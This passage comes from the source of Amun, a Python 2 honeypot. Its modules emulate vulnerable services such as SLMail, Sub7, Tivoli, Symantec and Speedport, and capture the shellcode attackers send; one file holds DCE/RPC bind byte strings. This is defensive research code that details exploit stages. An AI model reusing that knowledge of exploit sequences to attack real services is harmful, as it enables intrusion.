  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | #import sasserftpd_shellcodes
 21 | 
 22 | class vuln:
 23 | 	def __init__(self):
 24 | 		try:
 25 | 			self.vuln_name = "SASSERFTPD Vulnerability"
 26 | 			self.stage = "SASSERFTPD_STAGE1"
 27 | 			self.welcome_message = ""
 28 | 			self.shellcode = []
 29 | 		except KeyboardInterrupt:
 30 | 			raise
 31 | 
 32 | 	def print_message(self, data):
 33 | 		print "\n"
 34 | 		counter = 1
 35 | 		for byte in data:
 36 | 			if counter==16:
 37 | 				ausg = hex(struct.unpack('B',byte)[0])
 38 | 				if len(ausg) == 3:
 39 | 					list = str(ausg).split('x')
 40 | 					ausg = "%sx0%s" % (list[0],list[1])
 41 | 					print ausg
 42 | 				else:
 43 | 					print ausg
 44 | 				counter = 0
 45 | 			else:
 46 | 				ausg = hex(struct.unpack('B',byte)[0])
 47 | 				if len(ausg) == 3:
 48 | 					list = str(ausg).split('x')
 49 | 					ausg = "%sx0%s" % (list[0],list[1])
 50 | 					print ausg,
 51 | 				else:
 52 | 					print ausg,
 53 | 			counter += 1
 54 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 55 | 
 56 | 	def getVulnName(self):
 57 | 		return self.vuln_name
 58 | 
 59 | 	def getCurrentStage(self):
 60 | 		return self.stage
 61 | 
 62 | 	def getWelcomeMessage(self):
 63 |                 return self.welcome_message
 64 | 
 65 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 66 | 		try:
 67 | 			self.reply = []
 68 | 			for i in range(0,62):
 69 | 				try:
 70 | 					self.reply.append("\x00")
 71 | 				except KeyboardInterrupt:
 72 | 					raise
 73 | 			resultSet = {}
 74 | 			resultSet['vulnname'] = self.vuln_name
 75 | 			resultSet['result'] = False
 76 | 			resultSet['accept'] = False
 77 | 			resultSet['shutdown'] = False
 78 | 			resultSet['reply'] = "None"
 79 | 			resultSet['stage'] = self.stage
 80 | 			resultSet['shellcode'] = "None"
 81 | 			resultSet["isFile"] = False
 82 | 
 83 | 			if self.stage=="SASSERFTPD_STAGE1":
 84 | 				resultSet['result'] = True
 85 | 				resultSet['accept'] = True
 86 | 				self.reply[9] = "\x00"
 87 | 				resultSet['reply'] = "".join(self.reply)
 88 | 				self.stage = "SASSERFTPD_STAGE2"
 89 | 				return resultSet
 90 | 			elif self.stage=="SASSERFTPD_STAGE2":
 91 | 				resultSet['result'] = True
 92 | 				resultSet['accept'] = True
 93 | 				self.reply[9] = "\x00"
 94 | 				resultSet['reply'] = "".join(self.reply)
 95 | 				self.stage = "SHELLCODE"
 96 | 				return resultSet
 97 | 			elif self.stage=="SHELLCODE":
 98 | 				if bytes>0:
 99 | 					#print ".::[Amun - SASSERFTPD] collecting shellcode: %s ::." % (bytes)
100 | 					resultSet['result'] = True
101 | 					resultSet['accept'] = True
102 | 					#resultSet['reply'] = "".join(self.reply)
103 | 					self.shellcode.append(message)
104 | 					self.stage = "SHELLCODE"
105 | 					#resultSet['shellcode'] = "".join(self.shellcode)
106 | 					return resultSet
107 | 				else:
108 | 					#print ".::[Amun - SASSERFTPD] finish collecting shellcode (bytes %s) ::." % (bytes)
109 | 					resultSet['result'] = False
110 | 					resultSet['accept'] = True
111 | 					resultSet['reply'] = "None"
112 | 					self.shellcode.append(message)
113 | 					resultSet['shellcode'] = "".join(self.shellcode)
114 | 					return resultSet
115 | 			else:
116 | 				resultSet['result'] = False
117 | 				resultSet['accept'] = False
118 | 				resultSet['reply'] = "None"
119 | 				return resultSet
120 | 			return resultSet
121 | 		except KeyboardInterrupt:
122 | 			raise
123 | 		except StandardError, e:
124 | 			print e
125 | 			return resultSet
126 | 		except:
127 | 			print "SASSERFTPD FATAL ERROR!"
128 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-slmail/slmail_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import slmail_shellcodes
 21 | import os
 22 | 
 23 | class vuln:
 24 | 
 25 | 	def __init__(self):
 26 | 		try:
 27 | 			self.vuln_name = "SLMAIL Vulnerability"
 28 | 			self.stage = "SLMAIL_STAGE1"
 29 | 			self.welcome_message = "220 mailserver"
 30 | 			self.shellcode = []
 31 | 		except KeyboardInterrupt:
 32 | 			raise
 33 | 
 34 | 	def print_message(self, data):
 35 | 		print "\n"
 36 | 		counter = 1
 37 | 		for byte in data:
 38 | 			if counter==16:
 39 | 				ausg = hex(struct.unpack('B',byte)[0])
 40 | 				if len(ausg) == 3:
 41 | 					list = str(ausg).split('x')
 42 | 					ausg = "%sx0%s" % (list[0],list[1])
 43 | 					print ausg
 44 | 				else:
 45 | 					print ausg
 46 | 				counter = 0
 47 | 			else:
 48 | 				ausg = hex(struct.unpack('B',byte)[0])
 49 | 				if len(ausg) == 3:
 50 | 					list = str(ausg).split('x')
 51 | 					ausg = "%sx0%s" % (list[0],list[1])
 52 | 					print ausg,
 53 | 				else:
 54 | 					print ausg,
 55 | 			counter += 1
 56 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 57 | 
 58 | 	def getVulnName(self):
 59 | 		return self.vuln_name
 60 | 
 61 | 	def getCurrentStage(self):
 62 | 		return self.stage
 63 | 
 64 | 	def getWelcomeMessage(self):
 65 | 		return self.welcome_message
 66 | 
 67 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 68 | 		try:
 69 | 			self.reply = []
 70 | 			for i in range(0,510):
 71 | 				try:
 72 | 					self.reply.append("\x00")
 73 | 				except KeyboardInterrupt:
 74 | 					raise
 75 | 			resultSet = {}
 76 | 			resultSet['vulnname'] = self.vuln_name
 77 | 			resultSet['result'] = False
 78 | 			resultSet['accept'] = False
 79 | 			resultSet['shutdown'] = False
 80 | 			resultSet['reply'] = "None"
 81 | 			resultSet['stage'] = self.stage
 82 | 			resultSet['shellcode'] = "None"
 83 | 			resultSet["isFile"] = False
 84 | 
 85 | 			if self.stage=="SLMAIL_STAGE1" and (message.startswith('USER') or message.startswith('user')):
 86 | 				resultSet['result'] = True
 87 | 				resultSet['accept'] = True
 88 | 				self.reply = "220 OK"
 89 | 				resultSet['reply'] = self.reply
 90 | 				self.stage = "SLMAIL_STAGE2"
 91 | 				return resultSet
 92 | 			elif self.stage=="SLMAIL_STAGE2" and (message.startswith('QUIT') or message.startswith('quit')):
 93 | 				resultSet['accept'] = True
 94 | 				resultSet['result'] = False
 95 | 				resultSet['shellcode'] = "None"
 96 | 				resultSet['reply'] = "None"
 97 | 				return resultSet
 98 | 			elif self.stage=="SLMAIL_STAGE2" and bytes>=1024 and (message.startswith('PASS') or message.startswith('pass')):
 99 | 				resultSet['result'] = True
100 | 				resultSet['accept'] = True
101 | 				self.shellcode.append(message)
102 | 				self.reply = "220 OK"
103 | 				resultSet['reply'] = self.reply
104 | 				self.stage = "SHELLCODE"
105 | 				return resultSet
106 | 			elif self.stage=="SHELLCODE":
107 | 				if bytes>0:
108 | 					resultSet['result'] = True
109 | 					resultSet['accept'] = True
110 | 					self.shellcode.append(message)
111 | 					self.stage = "SHELLCODE"
112 | 					self.reply = "220 OK"
113 | 					resultSet['reply'] = self.reply
114 | 					#resultSet['shellcode'] = "".join(self.shellcode)
115 | 					return resultSet
116 | 				else:
117 | 					resultSet['result'] = False
118 | 					resultSet['accept'] = True
119 | 					self.reply = "220 OK"
120 | 					resultSet['reply'] = self.reply
121 | 					self.shellcode.append(message)
122 | 					resultSet['shellcode'] = "".join(self.shellcode)
123 | 					return resultSet
124 | 			else:
125 | 				resultSet['result'] = False
126 | 				resultSet['reply'] = "None"
127 | 				return resultSet
128 | 			return resultSet
129 | 		except KeyboardInterrupt:
130 | 			raise
131 | 		except StandardError, e:
132 | 			print e
133 | 			return resultSet
134 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-slmail/slmail_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-smb/smb_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-smb/smb_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-speedport/speedport_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2016]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import speedport_shellcodes
 21 | 
 22 | import amun_logging
 23 | 
 24 | ### Modul to analyze speedport TCP 7547 vulnerabilities, get everything send to a port and send it to shellcode_manager
 25 | 
 26 | class vuln:
 27 | 	def __init__(self):
 28 | 		try:
 29 | 			self.vuln_name = "SPEEDPORT Vulnerability"
 30 | 			self.stage = "STAGE1"
 31 | 			self.welcome_message = ""
 32 | 			self.shellcode = []
 33 | 		except KeyboardInterrupt:
 34 | 			raise
 35 | 
 36 | 	def print_message(self, data):
 37 | 		print "\n"
 38 | 		counter = 1
 39 | 		for byte in data:
 40 | 			if counter==16:
 41 | 				ausg = hex(struct.unpack("B",byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split("x")
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg
 46 | 				else:
 47 | 					print ausg
 48 | 				counter = 0
 49 | 			else:
 50 | 				ausg = hex(struct.unpack("B",byte)[0])
 51 | 				if len(ausg) == 3:
 52 | 					list = str(ausg).split("x")
 53 | 					ausg = "%sx0%s" % (list[0],list[1])
 54 | 					print ausg,
 55 | 				else:
 56 | 					print ausg,
 57 | 			counter += 1
 58 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 59 | 
 60 | 	def getVulnName(self):
 61 | 		return self.vuln_name
 62 | 
 63 | 	def getCurrentStage(self):
 64 | 		return self.stage
 65 | 
 66 | 	def getWelcomeMessage(self):
 67 | 		return self.welcome_message
 68 | 
 69 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 70 | 		try:
 71 | 			self.log_obj = amun_logging.amun_logging("vuln_speedport", vuLogger)
 72 | 
 73 | 			### construct standard reply
 74 | 			self.reply = random_reply[:62]
 75 | 
 76 | 			### prepare default resultSet
 77 | 			resultSet = {}
 78 | 			resultSet["vulnname"] = self.vuln_name
 79 | 			resultSet["accept"] = False
 80 | 			resultSet["result"] = False
 81 | 			resultSet["shutdown"] = False
 82 | 			resultSet["reply"] = "None"
 83 | 			resultSet["stage"] = self.stage
 84 | 			resultSet["shellcode"] = "None"
 85 | 			resultSet["isFile"] = False
 86 | 
 87 | 			if self.stage == "STAGE1" and bytes>0:
 88 | 				print ".::[Amun - Speedport] collecting stage1 (bytes %s ip %s) ::." % (bytes,ip)
 89 | 				self.print_message(message)
 90 | 				resultSet['result'] = True
 91 | 				resultSet['accept'] = True
 92 | 				resultSet['reply'] = "".join(self.reply)
 93 | 				self.shellcode.append(message)
 94 | 				self.stage = "SHELLCODE"
 95 | 				return resultSet
 96 | 			elif self.stage == "SHELLCODE":
 97 | 				if bytes>0:
 98 | 					print ".::[Amun - Speedport] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
 99 | 					resultSet["result"] = True
100 | 					resultSet["accept"] = True
101 | 					resultSet['reply'] = "".join(self.reply)
102 | 					self.shellcode.append(message)
103 | 					self.stage = "SHELLCODE"
104 | 					return resultSet
105 | 				else:
106 | 					print ".::[Amun - Speedport] finish collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
107 | 					resultSet["result"] = False
108 | 					resultSet["accept"] = True
109 | 					resultSet["reply"] = "None"
110 | 					self.shellcode.append(message)
111 | 					resultSet["shellcode"] = "".join(self.shellcode)
112 | 					return resultSet
113 | 			else:
114 | 				resultSet["result"] = False
115 | 				resultSet["accept"] = False
116 | 				resultSet["reply"] = "None"
117 | 				return resultSet
118 | 			return resultSet
119 | 		except KeyboardInterrupt:
120 | 			raise
121 | 		except StandardError, e:
122 | 			print e
123 | 		except:
124 | 			print "Speedport fatal error"
125 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-speedport/speedport_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-speedport/speedport_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-sub7/sub7_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import amun_logging
 20 | import random
 21 | import sub7_shellcodes
 22 | 
 23 | class vuln:
 24 | 	def __init__(self):
 25 | 		try:
 26 | 			self.vuln_name = "SUB7 Vulnerability"
 27 | 			self.stage = "SUB7_STAGE1"
 28 | 			self.welcome_message = "PWD"
 29 | 			self.shellcode = []
 30 | 		except KeyboardInterrupt:
 31 | 			raise
 32 | 
 33 | 	def print_message(self, data):
 34 | 		print "\n"
 35 | 		counter = 1
 36 | 		for byte in data:
 37 | 			if counter==16:
 38 | 				ausg = hex(struct.unpack("B",byte)[0])
 39 | 				if len(ausg) == 3:
 40 | 					list = str(ausg).split("x")
 41 | 					ausg = "%sx0%s" % (list[0],list[1])
 42 | 					print ausg
 43 | 				else:
 44 | 					print ausg
 45 | 				counter = 0
 46 | 			else:
 47 | 				ausg = hex(struct.unpack("B",byte)[0])
 48 | 				if len(ausg) == 3:
 49 | 					list = str(ausg).split("x")
 50 | 					ausg = "%sx0%s" % (list[0],list[1])
 51 | 					print ausg,
 52 | 				else:
 53 | 					print ausg,
 54 | 			counter += 1
 55 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 56 | 
 57 | 	def getVulnName(self):
 58 | 		return self.vuln_name
 59 | 
 60 | 	def getCurrentStage(self):
 61 | 		return self.stage
 62 | 
 63 | 	def getWelcomeMessage(self):
 64 | 		return self.welcome_message
 65 | 
 66 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 67 | 		try:
 68 | 			self.log_obj = amun_logging.amun_logging("vuln_sub7", vuLogger)
 69 | 
 70 | 			### construct standard reply
 71 | 			self.reply = []
 72 | 			self.reply.append("None")
 73 | 
 74 | 			### prepare default resultSet
 75 | 			resultSet = {}
 76 | 			resultSet["vulnname"] = self.vuln_name
 77 | 			resultSet["accept"] = False
 78 | 			resultSet["result"] = False
 79 | 			resultSet["shutdown"] = False
 80 | 			resultSet["reply"] = "None"
 81 | 			resultSet["stage"] = self.stage
 82 | 			resultSet["shellcode"] = "None"
 83 | 			resultSet["isFile"] = False
 84 | 
 85 | 			if self.stage == "SUB7_STAGE1" and message[:3]=="PWD":
 86 | 				resultSet["result"] = True
 87 | 				resultSet["accept"] = True
 88 | 				resultSet["reply"] = "You connected."
 89 | 				self.stage = "SUB7_STAGE2"
 90 | 				return resultSet
 91 | 			elif self.stage == "SUB7_STAGE2" and message[:3]=="TID":
 92 | 				resultSet["result"] = True
 93 | 				resultSet["accept"] = True
 94 | 				resultSet["reply"] = "UPS"
 95 | 				self.stage = "SUB7_STAGE3"
 96 | 				return resultSet
 97 | 			elif self.stage == "SUB7_STAGE3" and message[:5]=="SFT05":
 98 | 				resultSet["result"] = True
 99 | 				resultSet["accept"] = True
100 | 				#resultSet["reply"] = "".join(self.reply)
101 | 				self.stage = "SHELLCODE"
102 | 				self.log_obj.log("Incoming: %s" % (message), 6, "debug", True, False)
103 | 				return resultSet
104 | 			elif self.stage == "SHELLCODE":
105 | 				if bytes>0:
106 | 					resultSet["result"] = True
107 | 					resultSet["accept"] = True
108 | 					#resultSet["reply"] = "".join(self.reply)
109 | 					self.shellcode.append(message)
110 | 					self.stage = "SHELLCODE"
111 | 					#resultSet["shellcode"] = "".join(self.shellcode)
112 | 					return resultSet
113 | 				else:
114 | 					resultSet["result"] = False
115 | 					resultSet["accept"] = True
116 | 					resultSet['isFile'] = True
117 | 					resultSet["reply"] = "+OK RECVD"
118 | 					self.shellcode.append(message)
119 | 					resultSet["shellcode"] = "".join(self.shellcode)
120 | 					return resultSet
121 | 			else:
122 | 				resultSet["result"] = False
123 | 				resultSet["accept"] = False
124 | 				resultSet["reply"] = "None"
125 | 				return resultSet
126 | 			return resultSet
127 | 		except KeyboardInterrupt:
128 | 			raise
129 | 		except StandardError, e:
130 | 			print e
131 | 		except:
132 | 			print "SUB7 fatal error"
133 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-sub7/sub7_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-sub7/sub7_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-symantec/symantec_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import symantec_shellcodes
 21 | 
 22 | import amun_logging
 23 | 
 24 | import traceback
 25 | import StringIO
 26 | import sys
 27 | 
 28 | class vuln:
 29 | 	def __init__(self):
 30 | 		try:
 31 | 			self.vuln_name = "SYMANTEC Vulnerability"
 32 | 			self.stage = "SHELLCODE"
 33 | 			self.welcome_message = ""
 34 | 			self.shellcode = []
 35 | 		except KeyboardInterrupt:
 36 | 			raise
 37 | 
 38 | 	def print_message(self, data):
 39 | 		print "\n"
 40 | 		counter = 1
 41 | 		for byte in data:
 42 | 			if counter==16:
 43 | 				ausg = hex(struct.unpack("B",byte)[0])
 44 | 				if len(ausg) == 3:
 45 | 					list = str(ausg).split("x")
 46 | 					ausg = "%sx0%s" % (list[0],list[1])
 47 | 					print ausg
 48 | 				else:
 49 | 					print ausg
 50 | 				counter = 0
 51 | 			else:
 52 | 				ausg = hex(struct.unpack("B",byte)[0])
 53 | 				if len(ausg) == 3:
 54 | 					list = str(ausg).split("x")
 55 | 					ausg = "%sx0%s" % (list[0],list[1])
 56 | 					print ausg,
 57 | 				else:
 58 | 					print ausg,
 59 | 			counter += 1
 60 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 61 | 
 62 | 	def getVulnName(self):
 63 | 		return self.vuln_name
 64 | 
 65 | 	def getCurrentStage(self):
 66 | 		return self.stage
 67 | 
 68 | 	def getWelcomeMessage(self):
 69 | 		return self.welcome_message
 70 | 
 71 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 72 | 		try:
 73 | 			self.log_obj = amun_logging.amun_logging("vuln_symantec", vuLogger)
 74 | 
 75 | 			### construct standard reply
 76 | 			self.reply = []
 77 | 			for i in range(0,64):
 78 | 				try:
 79 | 					self.reply.append("\x00")
 80 | 				except KeyboardInterrupt:
 81 | 					raise
 82 | 
 83 | 			### prepare default resultSet
 84 | 			resultSet = {}
 85 | 			resultSet["vulnname"] = self.vuln_name
 86 | 			resultSet["accept"] = False
 87 | 			resultSet["result"] = False
 88 | 			resultSet["shutdown"] = False
 89 | 			resultSet["reply"] = "None"
 90 | 			resultSet["stage"] = self.stage
 91 | 			resultSet["shellcode"] = "None"
 92 | 			resultSet["isFile"] = False
 93 | 
 94 | 			if self.stage == "SHELLCODE":
 95 | 				if bytes>0:
 96 | 					resultSet["result"] = True
 97 | 					resultSet["accept"] = True
 98 | 					resultSet['reply'] = "".join(self.reply)+'*'
 99 | 					self.shellcode.append(message)
100 | 					self.stage = "SHELLCODE"
101 | 					#resultSet["shellcode"] = "".join(self.shellcode)
102 | 					return resultSet
103 | 				else:
104 | 					resultSet["result"] = False
105 | 					resultSet["accept"] = True
106 | 					resultSet["reply"] = "None"
107 | 					self.shellcode.append(message)
108 | 					resultSet["shellcode"] = "".join(self.shellcode)
109 | 					return resultSet
110 | 			else:
111 | 				resultSet["result"] = False
112 | 				resultSet["accept"] = False
113 | 				resultSet["reply"] = "None"
114 | 				return resultSet
115 | 			return resultSet
116 | 		except KeyboardInterrupt:
117 | 			raise
118 | 		except StandardError, e:
119 | 			print e
120 | 			f = StringIO.StringIO()
121 | 			traceback.print_exc(file=f)
122 | 			print f.getvalue()
123 | 			sys.exit(1)
124 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-symantec/symantec_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-symantec/symantec_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-tivoli/tivoli_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import tivoli_shellcodes
 21 | 
 22 | import amun_logging
 23 | 
 24 | ### IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
 25 | ### Works for webdesproxy (cygwin) remote buffer overflow, as well
 26 | 
 27 | class vuln:
 28 | 	def __init__(self):
 29 | 		try:
 30 | 			self.vuln_name = "TIVOLI Vulnerability"
 31 | 			self.stage = "TIVOLI_STAGE1"
 32 | 			self.welcome_message = ""
 33 | 			self.shellcode = []
 34 | 		except KeyboardInterrupt:
 35 | 			raise
 36 | 
 37 | 	def print_message(self, data):
 38 | 		print "\n"
 39 | 		counter = 1
 40 | 		for byte in data:
 41 | 			if counter==16:
 42 | 				ausg = hex(struct.unpack("B",byte)[0])
 43 | 				if len(ausg) == 3:
 44 | 					list = str(ausg).split("x")
 45 | 					ausg = "%sx0%s" % (list[0],list[1])
 46 | 					print ausg
 47 | 				else:
 48 | 					print ausg
 49 | 				counter = 0
 50 | 			else:
 51 | 				ausg = hex(struct.unpack("B",byte)[0])
 52 | 				if len(ausg) == 3:
 53 | 					list = str(ausg).split("x")
 54 | 					ausg = "%sx0%s" % (list[0],list[1])
 55 | 					print ausg,
 56 | 				else:
 57 | 					print ausg,
 58 | 			counter += 1
 59 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 60 | 
 61 | 	def getVulnName(self):
 62 | 		return self.vuln_name
 63 | 
 64 | 	def getCurrentStage(self):
 65 | 		return self.stage
 66 | 
 67 | 	def getWelcomeMessage(self):
 68 | 		return self.welcome_message
 69 | 
 70 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 71 | 		try:
 72 | 			### logging obj
 73 | 			self.log_obj = amun_logging.amun_logging("vuln_tivoli", vuLogger)
 74 | 
 75 | 			### construct standard reply
 76 | 			self.reply = []
 77 | 			for i in range(0,510):
 78 | 				try:
 79 | 					self.reply.append("\x00")
 80 | 				except KeyboardInterrupt:
 81 | 					raise
 82 | 
 83 | 			### prepare default resultSet
 84 | 			resultSet = {}
 85 | 			resultSet["vulnname"] = self.vuln_name
 86 | 			resultSet["accept"] = False
 87 | 			resultSet["result"] = False
 88 | 			resultSet["shutdown"] = False
 89 | 			resultSet["reply"] = "None"
 90 | 			resultSet["stage"] = self.stage
 91 | 			resultSet["shellcode"] = "None"
 92 | 			resultSet["isFile"] = False
 93 | 
 94 | 			if self.stage=="TIVOLI_STAGE1" and bytes>=1024:
 95 | 				resultSet["result"] = True
 96 | 				resultSet["accept"] = True
 97 | 				resultSet['reply'] = "".join(self.reply)
 98 | 				self.shellcode.append(message)
 99 | 				self.stage = "SHELLCODE"
100 | 				return resultSet
101 | 			elif self.stage == "SHELLCODE":
102 | 				if bytes>0:
103 | 					resultSet["result"] = True
104 | 					resultSet["accept"] = True
105 | 					resultSet['reply'] = "".join(self.reply)
106 | 					self.shellcode.append(message)
107 | 					self.stage = "SHELLCODE"
108 | 					return resultSet
109 | 				else:
110 | 					resultSet["result"] = False
111 | 					resultSet["accept"] = True
112 | 					resultSet["reply"] = "None"
113 | 					self.shellcode.append(message)
114 | 					resultSet["shellcode"] = "".join(self.shellcode)
115 | 					return resultSet
116 | 			else:
117 | 				resultSet["result"] = False
118 | 				resultSet["accept"] = False
119 | 				resultSet["reply"] = "None"
120 | 				return resultSet
121 | 			return resultSet
122 | 		except KeyboardInterrupt:
123 | 			raise
124 | 		except StandardError, e:
125 | 			print e
126 | 		except:
127 | 			print "TIVOLI fatal error"
128 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-tivoli/tivoli_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-tivoli/tivoli_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-trend/trend_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | dce_bind1 = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"
3 | 
4 | dce_bind2 = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x88\x88\x28\x25\x5b\xbd\xd1\x11\x9d\x53\x00\x80\xc8\x3a\x5c\x2c\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"
5 | 
6 | rpc_bind1 = "\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00"
7 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-upnp/upnp_modul.py:
--------------------------------------------------------------------------------
  1 | """
